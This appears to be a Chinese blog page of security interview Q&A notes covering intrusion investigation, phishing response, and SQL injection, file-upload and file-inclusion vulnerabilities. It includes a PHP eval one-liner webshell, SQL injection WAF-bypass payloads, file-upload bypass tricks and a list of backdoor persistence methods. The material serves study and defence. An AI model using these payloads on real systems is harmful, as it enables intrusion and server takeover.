<h2 id="暴力破解加固方法？"><a href="#暴力破解加固方法？" class="headerlink" title="暴力破解加固方法？"></a>暴力破解加固方法？</h2><p>添加强度较高的验证码，不易被破解<br>修改密码设置规则，提高用户的密码强度<br>同一账号登陆次数锁定，生成锁定日志<br>定期排查弱口令</p>
<h2 id="Sql注入加固措施？"><a href="#Sql注入加固措施？" class="headerlink" title="Sql注入加固措施？"></a>Sql注入加固措施？</h2><p>对于输入的字符进行过滤<br>使用 PDO 预编译语句处理</p>
<h1 id="和webshell有关"><a href="#和webshell有关" class="headerlink" title="和webshell有关"></a>和webshell有关</h1><h2 id="常用的Webshell检测工具"><a href="#常用的Webshell检测工具" class="headerlink" title="常用的Webshell检测工具"></a>常用的Webshell检测工具</h2><p>D盾<br>河马WEBSHELL<br>Web shell Detector<br>PHP Malware Finder</p>
<h2 id="确定红队在打服务器，而且进行文件上传的操作，怎么判断是不是webshell"><a href="#确定红队在打服务器，而且进行文件上传的操作，怎么判断是不是webshell" class="headerlink" title="确定红队在打服务器，而且进行文件上传的操作，怎么判断是不是webshell"></a>确定红队在打服务器，而且进行文件上传的操作，怎么判断是不是webshell</h2><p>一般webshell文件名后缀为jsp、php、py、asp等；<br>上传的文件如果是被加密的，可能是webshell,因为正常的操作一般不会上传脚本文件，加密的原因是因为过查杀，正常文件是不需要过查杀的。<br>由于webshell内需要执行对应的功能，例如命令执行，连接数据库等，所以文件内容中会存在相关的函数关键字，如：Runtime.getRuntime()、eval()、system、request()等<br>一般webshell里可能有对应的访问控制，所以内容中可能会包含username、password字样。</p>
<h2 id="无文件Webshell实现的方式有哪些"><a href="#无文件Webshell实现的方式有哪些" class="headerlink" title="无文件Webshell实现的方式有哪些"></a>无文件Webshell实现的方式有哪些</h2><p>基于servlet规范，通过动态注册Servlet、Filter、Listener等实现无文件webshell<br>基于特定框架，如 Spring 框架下动态注册 Controller 等。<br>基于 JAVA Agent，如 memShell</p>
<h1 id="权限"><a href="#权限" class="headerlink" title="权限"></a>权限</h1><h2 id="介绍几种权限维持的方法"><a href="#介绍几种权限维持的方法" class="headerlink" title="介绍几种权限维持的方法"></a>介绍几种权限维持的方法</h2><p>匿名用户<br>PHP内存型木马<br>Shift 后门<br>放大镜后门<br>user.ini文件构成的PHP后门<br>注册表开机自动启动项<br>DLL 劫持<br>计划任务</p>
<h2 id="kali权限提升"><a href="#kali权限提升" class="headerlink" title="kali权限提升"></a>kali权限提升</h2><p>a、mysql提权，udf提权，mof提权，serv-u提权，oracle提权<br>b、windows 溢出提权<br>c、linux脏牛,内核漏洞提权 日志清理 总结报告及修复方案</p>
<h2 id="Windows常用的提权方法"><a href="#Windows常用的提权方法" class="headerlink" title="Windows常用的提权方法"></a>Windows常用的提权方法</h2><p>系统内核溢出漏洞提权<br>数据库提权<br>错误的系统配置提权<br>组策略首选项提权<br>WEB中间件漏洞提权<br>DLL劫持提权<br>滥用高危权限令牌提权<br>第三方软件&#x2F;服务提权等</p>
<h1 id="入侵排查具体流程"><a href="#入侵排查具体流程" class="headerlink" title="入侵排查具体流程"></a>入侵排查具体流程</h1><h2 id="Windows入侵排查思路"><a href="#Windows入侵排查思路" class="headerlink" title="Windows入侵排查思路"></a>Windows入侵排查思路</h2><p>检查系统账号安全<br>查看服务器是否有弱口令，远程管理端口是否对公网开放（使用netstat -ano 命令、或者问服务器管理员）<br>lusrmgr.msc 命令查看服务器是否存在可疑账号、新增账号，如有管理员群组的（Administrators）里的新增账户，如有，请立即禁用或删除掉<br>用 D 盾或者注册表中查看服务器是否存在隐藏账号、克隆账号<br>结合日志，查看管理员登录时间、用户名是否存在异常<br>检查方法：Win+R 打开运行，输入“eventvwr.msc”，回车运行，打开“事件查看器”，导出 Windows 日志–安全，利用 Log Parser 进行分析<br>检查异常端口、进程<br>netstat -ano检查端口连接情况，是否有远程连接、可疑连接<br>任务管理器-进程<br>检查启动项、计划任务、服务<br>检查系统相关信息<br>查看系统版本以及补丁信息<br>查找可疑目录及文件<br>日志分析</p>
<h2 id="Linux入侵排查思路"><a href="#Linux入侵排查思路" class="headerlink" title="Linux入侵排查思路"></a>Linux入侵排查思路</h2><p>账号安全<br>who查看当前登录用户（tty本地登陆 pts远程登录）<br>w 查看系统信息，想知道某一时刻用户的行为<br>uptime查看登陆多久、多少用户，负载<br>1、用户信息文件&#x2F;etc&#x2F;passwd<br>root:x:0:0:root:&#x2F;root:&#x2F;bin&#x2F;bash<br>account:password:UID:GID:GECOS:directory:shell<br>用户名：密码：用户ID：组ID：用户说明：家目录：登陆之后shell<br>注意：无密码只允许本机登陆，远程不允许登陆</p>
<p>2、影子文件&#x2F;etc&#x2F;shadow<br>root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI&#x2F;:16809:0:99999:7:::<br>用户名：加密密码：密码最后一次修改日期：两次密码的修改时间间隔：密码有效期：密码修改到期到的警告天数：密码过期之后的宽限天数：账号失效时间：保留<br>&#x2F;etc&#x2F;passwd 存储一般的用户信息，任何人都可以访问；&#x2F;etc&#x2F;shadow 存储用户的密码信息，只有 root 用户可以访问<br>历史命令<br>通过 .bash_history 查看帐号执行过的系统命令<br>1、root的历史命令 histroy<br>2、打开 &#x2F;home 各帐号目录下的 .bash_history，查看普通帐号的历史命令</p>
<p>历史操作命令的清除：history -c<br>但此命令并不会清除保存在文件中的记录，因此需要手动删除.bash_profile文件中的记录<br>检查异常端口<br>netstat -antlp|more<br>查看下pid所对应的进程文件路径，<br>运行ls -l &#x2F;proc&#x2F;$PID&#x2F;exe或file &#x2F;proc&#x2F;$PID&#x2F;exe（$PID 为对应的pid 号）<br>检查异常进程<br>ps aux | grep pid<br>检查开机启动项<br>开机启动配置文件<br>&#x2F;etc&#x2F;rc.local<br>&#x2F;etc&#x2F;rc.d&#x2F;rc[0~6].d<br>检查定时任务<br>crontab -l 列出某个用户cron服务的详细内容<br>Tips：默认编写的crontab文件会保存在 (&#x2F;var&#x2F;spool&#x2F;cron&#x2F;用户名 例如: &#x2F;var&#x2F;spool&#x2F;cron&#x2F;root<br>crontab -r 删除每个用户cront任务(谨慎：删除所有的计划任务)<br>crontab -e 使用编辑器编辑当前的crontab文件<br>如：*&#x2F;1 * * * * echo “hello world” &gt;&gt; &#x2F;tmp&#x2F;test.txt 每分钟写入文件<br>2、利用anacron实现异步定时任务调度<br>重点关注<br>&#x2F;var&#x2F;spool&#x2F;cron&#x2F;*<br>&#x2F;etc&#x2F;crontab<br>&#x2F;etc&#x2F;cron.d&#x2F;*<br>&#x2F;etc&#x2F;cron.daily&#x2F;*<br>&#x2F;etc&#x2F;cron.hourly&#x2F;*<br>&#x2F;etc&#x2F;cron.monthly&#x2F;*<br>&#x2F;etc&#x2F;cron.weekly&#x2F;<br>&#x2F;etc&#x2F;anacrontab<br>&#x2F;var&#x2F;spool&#x2F;anacron&#x2F;*<br>检查服务<br>chkconfig –list 命令，可以查看系统运行的服务<br>检查异常文件<br>检查系统日志</p>
<h1 id="钓鱼邮件"><a href="#钓鱼邮件" class="headerlink" title="钓鱼邮件"></a>钓鱼邮件</h1><h2 id="如何发现钓鱼邮件"><a href="#如何发现钓鱼邮件" class="headerlink" title="如何发现钓鱼邮件"></a>如何发现钓鱼邮件</h2><p>邮件系统异常登录告警、员工上报、异常行为告警、邮件蜜饵告警</p>
<p>推荐接入微步或奇安信的情报数据。</p>
<p>对邮件内容出现的 URL 做扫描，可以发现大量的异常链接</p>
<h2 id="遇到钓鱼邮件如何处置？"><a href="#遇到钓鱼邮件如何处置？" class="headerlink" title="遇到钓鱼邮件如何处置？"></a>遇到钓鱼邮件如何处置？</h2><p>1、第一时间隔离被钓鱼的主机</p>
<p>2、通过第三方联系方式对攻击进行预警，防止其他员工再次上钩</p>
<p>3、对钓鱼邮件中的样本进行取样，分析溯源</p>
<p>4、HW前期针对安全意识进行培训</p>
<h2 id="说说钓鱼邮件处置实际操作"><a href="#说说钓鱼邮件处置实际操作" class="headerlink" title="说说钓鱼邮件处置实际操作"></a>说说钓鱼邮件处置实际操作</h2><p>屏蔽办公区域对钓鱼邮件内容涉及站点、URL 访问</p>
<p>根据办公环境实际情况可以在上网行为管理、路由器、交换机上进行屏蔽</p>
<p>邮件内容涉及域名、IP 均都应该进行屏蔽</p>
<p>对访问钓鱼网站的内网 IP 进行记录，以便后续排查溯源可能的后果</p>
<p>屏蔽钓鱼邮件</p>
<p>屏蔽钓鱼邮件来源邮箱域名</p>
<p>屏蔽钓鱼邮件来源 IP</p>
<p>有条件的可以根据邮件内容进行屏蔽</p>
<p>删除还在邮件服务器未被客户端收取钓鱼邮件</p>
<p>处理接收到钓鱼邮件的用户</p>
<p>根据钓鱼邮件发件人进行日志回溯</p>
<p>此处除了需要排查有多少人接收到钓鱼邮件之外，还需要排查是否公司通讯录泄露。采用 TOP500 姓氏撞库发送钓鱼邮件的攻击方式相对后续防护较为简单。如果发现是使用公司通讯录顺序则需要根据通讯录的离职情况及新加入员工排查通讯录泄露时间。毕竟有针对性的社工库攻击威力要比 TOP100、TOP500 大很多</p>
<p>通知已接收钓鱼邮件的用户进行处理</p>
<p>删除钓鱼邮件</p>
<p>系统改密</p>
<p>全盘扫毒</p>
<p>后续：溯源、员工培训提升安全意识</p>
<h2 id="如何判断是钓鱼邮件"><a href="#如何判断是钓鱼邮件" class="headerlink" title="如何判断是钓鱼邮件"></a>如何判断是钓鱼邮件</h2><p>以公司某部门的名义，如安全部、综合部，使用正式的语气，内容涉及到账号和密码等敏感信息，可能带有链接地址或附件，制造紧张氛围，比如24小时内今日下班前完整账号密码修改。<br>看发件人 设备上也会报IP 上微步查一下IP是不是恶意IP 邮件的发件人和内容是不是正常的业务往来<br>附件放到沙箱里 看看是否有问题<br>有的邮件会提示你邮件由另一个邮箱代发，或者邮箱地址不是本公司的，再或者邮箱地址是qq或者163等个人邮箱的，那就更没跑了</p>
<h2 id="获取到钓鱼邮件exe如何分析？"><a href="#获取到钓鱼邮件exe如何分析？" class="headerlink" title="获取到钓鱼邮件exe如何分析？"></a>获取到钓鱼邮件exe如何分析？</h2><p>看创建日期，看备注信息</p>
<p>ida看调试信息，可能有个人id、网名</p>
<p>上传查杀、威胁检测平台，分析行为特征，获取内部url、ip地址等</p>
<p>各大威胁平台结果判断木马生成时间，是否已知</p>
<h1 id="中间件漏洞"><a href="#中间件漏洞" class="headerlink" title="中间件漏洞"></a>中间件漏洞</h1><p>一） IIS<br>1、PUT漏洞<br>2、短文件名猜解<br>3、远程代码执行<br>4、解析漏洞<br>（二） Apache<br>1、解析漏洞<br>2、目录遍历<br>（三） Nginx<br>1、文件解析<br>2、目录遍历<br>3、CRLF注入<br>4、目录穿越<br>（四）Tomcat<br>1、远程代码执行<br>2、war后门文件部署<br>（五）jBoss<br>1、反序列化漏洞<br>2、war后门文件部署<br>（六）WebLogic<br>1、反序列化漏洞<br>2、SSRF<br>3、任意文件上次<br>4、war后门文件部署<br>（七）其它中间件相关漏洞<br>1、FastCGI未授权访问、任意命令执行<br>2、PHPCGI远程代码执行</p>
<h1 id="linux重要目录"><a href="#linux重要目录" class="headerlink" title="linux重要目录"></a>linux重要目录</h1><h2 id="Liunx系统中任何权限都能访问的临时文件位置"><a href="#Liunx系统中任何权限都能访问的临时文件位置" class="headerlink" title="Liunx系统中任何权限都能访问的临时文件位置"></a>Liunx系统中任何权限都能访问的临时文件位置</h2><p>答：&#x2F;var&#x2F;tmp</p>
<h2 id="linux比较重要的目录"><a href="#linux比较重要的目录" class="headerlink" title="linux比较重要的目录"></a>linux比较重要的目录</h2><p>首先是日志，&#x2F;var&#x2F;log里面的message保存了比较重要的信息，一般出问题了登上去首先会去看这里。<br>还有lastb查看登录错误的日志，last查看所有的登录日志，lastlog查看最后一次登录的日志，<br>还有&#x2F;var&#x2F;log&#x2F;secure记录了验证和授权方面的信息，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权。<br>home目录下面有个.bash_history，如果etc&#x2F;passwd发现有新增的可疑用户的话会去看一下，他记录了历史命令。<br>var&#x2F;spool&#x2F;cron里面有计划任务，留后门的话有可能会定时反弹shell。<br>home&#x2F;用户名&#x2F;ssh 记录了ssh公钥，查看有没有被留后门。<br>etc&#x2F;rc.local开机自启动。</p>
<h1 id="sqlmap的–os-shell参数取得shell"><a href="#sqlmap的–os-shell参数取得shell" class="headerlink" title="sqlmap的–os-shell参数取得shell"></a>sqlmap的–os-shell参数取得shell</h1><p>本质：写入两个 php 文件，其中的一个可以让我们用来执行命令，而另外一个可以让我们可以上传文件。<br>执行条件有三个：<br>1）网站必须是root权限<br>2）攻击者需要知道网站的绝对路径<br>3）GPC为off，php主动转义的功能关闭</p>
<h1 id="FOFA语法"><a href="#FOFA语法" class="headerlink" title="FOFA语法"></a>FOFA语法</h1><p>查询指定cms的管理系统：app&#x3D;”cms”<br>domain&#x3D; 搜索根域名带有xx的网站。例：domain&#x3D;“baidu.com”<br>host&#x3D;从url中搜索网站注意搜索要用host作为名称。例：host&#x3D; “.edu.cn”<br>port&#x3D; 查找对应443端口的资产。例：port&#x3D;3389<br>protocol&#x3D; 搜索制定协议类型(在开启端口扫描的情况下有效)。例：protocol&#x3D;ssh cert&#x3D;搜索证书(https或者imaps等)中带有域名的资产。例：cert&#x3D;baidu.com<br>banner&#x3D; 搜索协议中带有账户文本的资产。例：banner&#x3D;users &amp;&amp; protocol&#x3D;ftp<br>type&#x3D;搜索所有协议资产，支持subdomain和service两种。例：type&#x3D;servicce<br>server&#x3D;&#x3D; 搜索服务器、中间件名称。例：server&#x3D;apache<br>高级语法需要用管道符连接如：‘|| ‘ ‘&amp;&amp;’，如下：<br>body&#x3D;”后台”&amp;&amp;domain&#x3D;”xxx.com” 查询指定域名的后台<br>Header&#x3D;”Hikvision” 找摄像头</p>
<h1 id="Sql注入"><a href="#Sql注入" class="headerlink" title="Sql注入"></a>Sql注入</h1><h2 id="原理-："><a href="#原理-：" class="headerlink" title="原理 ##："></a>原理 ##：</h2><p>网站数据过滤不严格，过分信赖用户输入的数据, 没有过滤用户输入的恶意数据，无条件的把用户输入的数据当作SQL语句执行，因此导致sql注入漏洞产生</p>
<h2 id="Sql注入分类"><a href="#Sql注入分类" class="headerlink" title="Sql注入分类"></a>Sql注入分类</h2><p>以有无闭合字符分类：字符型、整数型<br>以数据传输方式分类：post类型、get类型<br>注入方式细分：联合查询注入、报错型注入、布尔型盲注、时间型盲注、宽字节注入</p>
<h2 id="报错注入："><a href="#报错注入：" class="headerlink" title="报错注入："></a>报错注入：</h2><h3 id="前提"><a href="#前提" class="headerlink" title="前提"></a>前提</h3><p>页面上没有显示位但是有sql语句执行错误信息输出位。<br>使用mysql_error()函数，可以返回上一个Mysql操作产生的文本错误信息。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>SQL报错注入就是利用数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用。</p>
<h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><p>UpdateXML()<br>Floor()<br>Extractvalue()</p>
<h3 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h3><p>BIGINT等数据类型溢出<br>xpath语法错误<br>floor（）报错<br>列名重复报错<br>参数不规范报错</p>
<h2 id="mysql默认存在的哪个数据库，注入时经常用到？"><a href="#mysql默认存在的哪个数据库，注入时经常用到？" class="headerlink" title="mysql默认存在的哪个数据库，注入时经常用到？"></a>mysql默认存在的哪个数据库，注入时经常用到？</h2><p>Information_schema</p>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><h3 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h3><p>攻击者根据其返回页面的不同来判断信息（可能是页面内容的不同，也可以是响 应时间不同</p>
<h3 id="时间型盲注特点？常用函数？易受到什么影响？"><a href="#时间型盲注特点？常用函数？易受到什么影响？" class="headerlink" title="时间型盲注特点？常用函数？易受到什么影响？"></a>时间型盲注特点？常用函数？易受到什么影响？</h3><p>场景：应用于无数据回显，无报错，布尔型盲注失效后 </p>
<p>特点：时间型盲注页面没有明显的回显，只能根据页面刷新时间的长短来去判断构造语句是否正确；</p>
<p>常用函数: sleep函数  if条件语句 length()，substr()、substring()，ascii()、ord()等<br>benchmark函数<br>benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度，benchmark()中带有两个参数，第一个是执行的次数，第二个是要执行的函数或者是表达式。</p>
<p>heavy query函数<br>原理是用到一些消耗资源的方式让数据库的查询时间尽量变长，而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积。</p>
<p>易受网络波动影响</p>
<h3 id="布尔型盲注特点-常用函数？"><a href="#布尔型盲注特点-常用函数？" class="headerlink" title="布尔型盲注特点?常用函数？"></a>布尔型盲注特点?常用函数？</h3><p>特点:根据页面正确和错误的两种状态，来判断构造语句是否正确<br>常用函数：<br>length()   #用以猜测数据返回字符串的长度<br>Sunstr()   #截取字符串<br>Mid()     #取出字符串的一部分值<br>Left()     #取出字符串左边的几个数据<br>Ascii()     #返回一个字符的ascii码值</p>
<h2 id="sql手注的一般步骤："><a href="#sql手注的一般步骤：" class="headerlink" title="sql手注的一般步骤："></a>sql手注的一般步骤：</h2><p>1、判断注入点<br>2、判断注入类型<br>3、判断注入点提交方式<br>4、使用order by语句查询数据库有多少字段<br>5、使用联合查询来查询 union select<br>   User（）   当前用户<br>   Database()    数据库<br>   Version()     数据库版本<br>6、查询数据库中的表、列和值</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p>有些waf会在我们的提交数据前会被加入\，\的编码为%5c,我们在后面加上%df后变为了%df%5c,变成一个繁体汉字運，变成了一个有多个字节的字符。因为用了gbk编码，使这个为一个两字节，绕过了单引号闭合,逃逸了转义</p>
<h2 id="Sql注入绕waf姿势-不用全都说，说几个就行"><a href="#Sql注入绕waf姿势-不用全都说，说几个就行" class="headerlink" title="Sql注入绕waf姿势(不用全都说，说几个就行)"></a>Sql注入绕waf姿势(不用全都说，说几个就行)</h2><p>1、函数大小写混合绕过:<br>可以绕过的原因：服务器端检测时未开启大小写不敏感<br>2、多重关键字绕过<br>可以绕过的原因:服务器端检测到敏感字符时替换为空<br>形式：ununionion selselectect<br>3、编码绕过<br>可以绕过的原因：服务器端未检测或检测不严具有编码形式的关键字<br>编码类型：十六进制编码、URL编码、Unicode编码<br>4、注释绕过<br>可以绕过的原因：服务器端未检测或检测不严注释内的字符串<br>注释形式: 形式：&#x2F;<strong>&#x2F;，&#x2F;<em>!</em>&#x2F;，&#x2F;<em>!12345</em>&#x2F;，#，– -等<br>5、等价函数或命令绕过<br>可以绕过的原因：服务器端黑名单不完整，过滤不严<br>等价函数形式：<br>Mysql查询：Union distinct、updatexml、Extractvalue、floor<br>字符串截取函数：mid、substr、substring、left、reverse<br>字符串连接函数：concat、group_concat、concat_ws<br>字符串转换：char、hex、unhex<br>替换逗号：limit 1 offset 0，mid(version() from 1 for 1)<br>替换等号：like<br>6、特殊符号绕过<br>绕过原因：数据库中效果相同，服务器端却没有限制<br>形式：<br>科学记数法 and 1e0 &#x3D; 1e0<br>空白字符 %0a %a0 %0b %20 %09<br>反单引号 <code>table_name</code><br>括号 select * from (test.admin)<br>7、组合绕过<br>可以绕过原因：服务器端检测多处位置，需要多重绕过方式组合使用<br>形式：id &#x3D; 1’ and&#x2F;</strong>&#x2F;’1’like’2’&#x2F;**&#x2F;&#x2F;<em>!12345union</em>&#x2F;select 1,2,3</p>
<h2 id="什么样的网站可能存在sql注入漏洞？"><a href="#什么样的网站可能存在sql注入漏洞？" class="headerlink" title="什么样的网站可能存在sql注入漏洞？"></a>什么样的网站可能存在sql注入漏洞？</h2><p>和数据库有数据交互的这种网站，比如一些用php，asp这一类动态脚本写的网站<br>还有就是伪静态的网站，虽然看着是html的网站，但是实际上是动态网站和数据库有数据交互。</p>
<h2 id="sql注入漏洞挂马利用成功的条件？（sql注入挂马）"><a href="#sql注入漏洞挂马利用成功的条件？（sql注入挂马）" class="headerlink" title="sql注入漏洞挂马利用成功的条件？（sql注入挂马）"></a>sql注入漏洞挂马利用成功的条件？（sql注入挂马）</h2><p>1、支持联合查询<br>2、知道网站的绝对路径<br>3、上传马的路径允许写入文件<br>4、木马上传上去后能够被解析执行。<br>5、能够找到木马上传上去以后的位置。</p>
<h2 id="当你发现一个网站存在sql注入漏洞时，你会怎么进行挂马"><a href="#当你发现一个网站存在sql注入漏洞时，你会怎么进行挂马" class="headerlink" title="当你发现一个网站存在sql注入漏洞时，你会怎么进行挂马?"></a>当你发现一个网站存在sql注入漏洞时，你会怎么进行挂马?</h2><p>我会通过手注的方式和sqlmap进行挂马</p>
<h2 id="说下手注方式挂马用到什么函数？"><a href="#说下手注方式挂马用到什么函数？" class="headerlink" title="说下手注方式挂马用到什么函数？"></a>说下手注方式挂马用到什么函数？</h2><p>union ,select ,into outfile </p>
<h2 id="你一般会怎么利用sql注入漏洞？"><a href="#你一般会怎么利用sql注入漏洞？" class="headerlink" title="你一般会怎么利用sql注入漏洞？"></a>你一般会怎么利用sql注入漏洞？</h2><p>1、利用sql注入漏洞去读数据,一般读用户数据，网站可能有后台<br>2、利用sql注入挂马直接拿下服务器权限。<br>如何挖掘sql注入漏洞?<br>  首先我会看下这个网站是否是动态网站，然后通过手工注入或者使用sqlmap工具进行扫描。<br>  如果详细说的话，手注会先尝试用敏感字符进行尝试，，找出闭合字符，然后根据页面状态选择注入的模式，比如如果是联合查询，接下来就是判断列数，判断显示位，求网站当前数据库，求当前数据库所有表名，求指定表下列名，求指定列名下字段。</p>
<h2 id="sql注入漏洞如何修复"><a href="#sql注入漏洞如何修复" class="headerlink" title="sql注入漏洞如何修复?"></a>sql注入漏洞如何修复?</h2><p>过滤恶意字符和函数（select  union  orderby）过滤或转义单引号双引号<br>使用参数化的语句来传递用户输入的变量<br>Sql预编译也可以预防</p>
<h2 id="Sql预编译原理-（PreparedStatement）"><a href="#Sql预编译原理-（PreparedStatement）" class="headerlink" title="Sql预编译原理 ##（PreparedStatement）"></a>Sql预编译原理 ##（PreparedStatement）</h2><p>预编译语句PreparedStatement 是java.sql中的一个接口，它是Statement的子接口。通过Statement对象执行SQL语句时，需要将SQL语句发送给DBMS，由DBMS首先进行编译后再执行。（预编译语句创建对象时就指定了sql语句）<br>预编译语句和Statement不同，在创建PreparedStatement 对象时就指定了SQL语句，该语句立即发送给DBMS进行编译。当该编译语句被执行时，DBMS直接运行编译后的SQL语句，而不需要像其他SQL语句那样首先将其编译。预编译的SQL语句处理性能稍微高于普通的传递变量的办法</p>
<h2 id="Sql注入getshell"><a href="#Sql注入getshell" class="headerlink" title="Sql注入getshell"></a>Sql注入getshell</h2><p>●web目录具有写权限，能够使用单引号<br>●知道网站绝对路径<br>●secure_file_priv没有具体值（在mysql&#x2F;my.ini中查看）</p>
<p>首先，利用outfile函数<br> into outfile<br>  利用条件：web目录具有写权限，能够使用单引号<br>知道网站绝对路径（根目录，或则是根目录往下的目录都行）<br>secure_file_priv没有具体值（在mysql&#x2F;my.ini中查看）<br>（secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。要修改secure_file_priv 的值为‘ ’才可以利用）</p>
<p>然后通过一些方法获取到了网站的根目录，则可以写入一句话 “ <?php eval($_REQUEST[1]);?> ”。一句话建议进行十六进制转码。</p>
<p>其次，利用–os-shell<br> –os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件，一个可以直接执行系统命令，一个进行上传文件。<br>利用条件：<br>●要求为DBA，–is-dba（phpstudy搭建的一般为DBA）<br>●secure_file_priv没有具体值<br>●知道网站的绝对路径<br>●GPC为off，php主动转义的功能关闭</p>
<h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><h2 id="1-文件上传漏洞原理"><a href="#1-文件上传漏洞原理" class="headerlink" title="(1)文件上传漏洞原理"></a>(1)文件上传漏洞原理</h2><p>开发人员未在文件上传点对文件名和文件内容做严格的过滤,导致用户可以上传恶意脚本到服务端。</p>
<h2 id="2-文件上传漏洞一般上传什么马"><a href="#2-文件上传漏洞一般上传什么马" class="headerlink" title="(2)文件上传漏洞一般上传什么马?"></a>(2)文件上传漏洞一般上传什么马?</h2><p>符合网站语言环境的一句话、冰蝎、大马等等</p>
<h2 id="3-文件上传绕waf方式"><a href="#3-文件上传绕waf方式" class="headerlink" title="(3)文件上传绕waf方式"></a>(3)文件上传绕waf方式</h2><p>绕过黑名单（大小写绕过）、绕过白名单%00截断（可以配合中间件漏洞），绕过前端验证(burp抓包修改Content-Type: 为允许的字段)，对文件内容进行绕过</p>
<h2 id="用什么后缀的马"><a href="#用什么后缀的马" class="headerlink" title="用什么后缀的马"></a>用什么后缀的马</h2><p>(1)当你进行文件上传时，发现网站是iis服务器你会上传什么后缀类型的马？<br>asp或者aspx<br>(2)当你上传asp的脚本文件时上传不上去，你会上尝试再上传什么类型的后缀文件？为什么上传此类后缀的文件脚本<br>我会尝试将文件后缀名改为asa或者cdx或者cer尝试进行上传；<br>Iis服务器开启了文件后缀扩展功能<br>(3)当你发现上传服务器是apache服务器，你会尝试上传什么后缀的马？<br>  php<br>(4)当你发现上传服务器中间件是tomcat中间件，你会尝试上传什么后缀的马？<br>Jsp<br>(5)当你发现上传服务器中间件是weblogic中间件，你会尝试上传什么后缀的马？<br>Jsp<br>(6)当你发现上传服务器中间件是nginx，你会尝试上传什么后缀的马？<br>Php</p>
<h2 id="10-文件上传漏洞防护"><a href="#10-文件上传漏洞防护" class="headerlink" title="(10)文件上传漏洞防护"></a>(10)文件上传漏洞防护</h2><p>防护：常见的防护措施比如文件类型可以通过白名单或者黑名单进行判断，当文件上传后对文件进行重命名呀，限制上传文件大小呀等。<br>白名单比黑名单要更安全一些。</p>
<h2 id="11-文件上传绕waf"><a href="#11-文件上传绕waf" class="headerlink" title="(11)文件上传绕waf"></a>(11)文件上传绕waf</h2><p>1 文件名大小写绕过<br>用像 AsP，pHp 之类的文件名绕过黑名单检测<br>2 名单列表绕过<br>用黑名单里没有的名单进行攻击，比如黑名单里没有 asa 或 cer 之类<br>3 特殊文件名绕过<br>比如发送的 http 包里把文件名改成 test.asp. 或 test.asp_(下划线为空格)，这种命名方式<br>在 windows 系统里是不被允许的，所以需要在 burp 之类里进行修改，然后绕过验证后，会<br>被 windows 系统自动去掉后面的点和空格，但要注意 Unix&#x2F;Linux 系统没有这个特性。<br>4 htaccess 文件<br>配合名单列表绕过，上传一个自定义的.htaccess，就可以轻松绕过各种检测<br>5 写入方法<br>首先名字为1.php:jpg，会写入一个1.php的空文件，然后再上传一个文件，然后修改名字为3.&lt;&lt;&lt;<br>这样就会把我们这个文件的内容写入到我们上传的那个1.php空文件中<br>参考：<a target="_blank" rel="noopener" href="https://www.waitalone.cn/php-windows-upload.html">https://www.waitalone.cn/php-windows-upload.html</a><br>6截断绕过上传<br>1.php .jpg 空格二进制20改为00<br>还有一些图片木马之类的，需要结合文件包含漏洞来解析</p>
<h1 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h1><h2 id="1-文件包含漏洞原理"><a href="#1-文件包含漏洞原理" class="headerlink" title="(1)文件包含漏洞原理"></a>(1)文件包含漏洞原理</h2><p>文件包含是指在程序编写过程中，为了减少重复的代码编写操作，将重复的代码采取从外部引入的方式，但如果包含被攻击者所控制，就可以通过包含精心构造的脚本文件来获取控制权，一般分为本地包含和远程包含，常出现在php等脚本语言中，包含命令主要有include,include_once,require,require_once。</p>
<h2 id="2-远程文件包含和本地文件包含的区别"><a href="#2-远程文件包含和本地文件包含的区别" class="headerlink" title="(2)远程文件包含和本地文件包含的区别"></a>(2)远程文件包含和本地文件包含的区别</h2><p>本地文件包含只能包含本地的文件。<br>远程文件包含要包含其他服务器的文件。若PHP配置选项allow_url_include为ON的话，则include函数是可以加载远程文件的。</p>
<h2 id="3-include-include-once-require-require-once这几个函数区别"><a href="#3-include-include-once-require-require-once这几个函数区别" class="headerlink" title="(3) include,include_once,require,require_once这几个函数区别"></a>(3) include,include_once,require,require_once这几个函数区别</h2><p>Include()     #找不到被包含的文件时只会产生警告，脚本继续运行<br>Require()     #找不到被包含的文件时会发生致命错误，停止脚本运行<br>Include_once()  #与include()类似，唯一区别是该文件中代码已经被包含，则不会再次包含<br>Require_once()  #与require()类似，……（同上）</p>
<h2 id="3-文件包含漏洞修复"><a href="#3-文件包含漏洞修复" class="headerlink" title="(3)文件包含漏洞修复"></a>(3)文件包含漏洞修复</h2><p>一般的防护手段包括  对文件进行敏感内容查找  或者限制文件类型等</p>
<h1 id="xss漏洞（跨站脚本攻击）"><a href="#xss漏洞（跨站脚本攻击）" class="headerlink" title="xss漏洞（跨站脚本攻击）"></a>xss漏洞（跨站脚本攻击）</h1><h2 id="1-xss漏洞原理及防护"><a href="#1-xss漏洞原理及防护" class="headerlink" title="(1)xss漏洞原理及防护"></a>(1)xss漏洞原理及防护</h2><p>前提：当应用程序没有对用户提交的内容进行验证和重新编码，而是直接呈现给网站的访问者时，就可能会触发XSS攻击<br>原理：攻击者利用相应的漏洞，在页面中嵌入JS脚本，用户访问含恶意脚本代码的页面或打开收到的URL链接时，用户浏览器自动加载执行恶意代码，达到攻击的目的。</p>
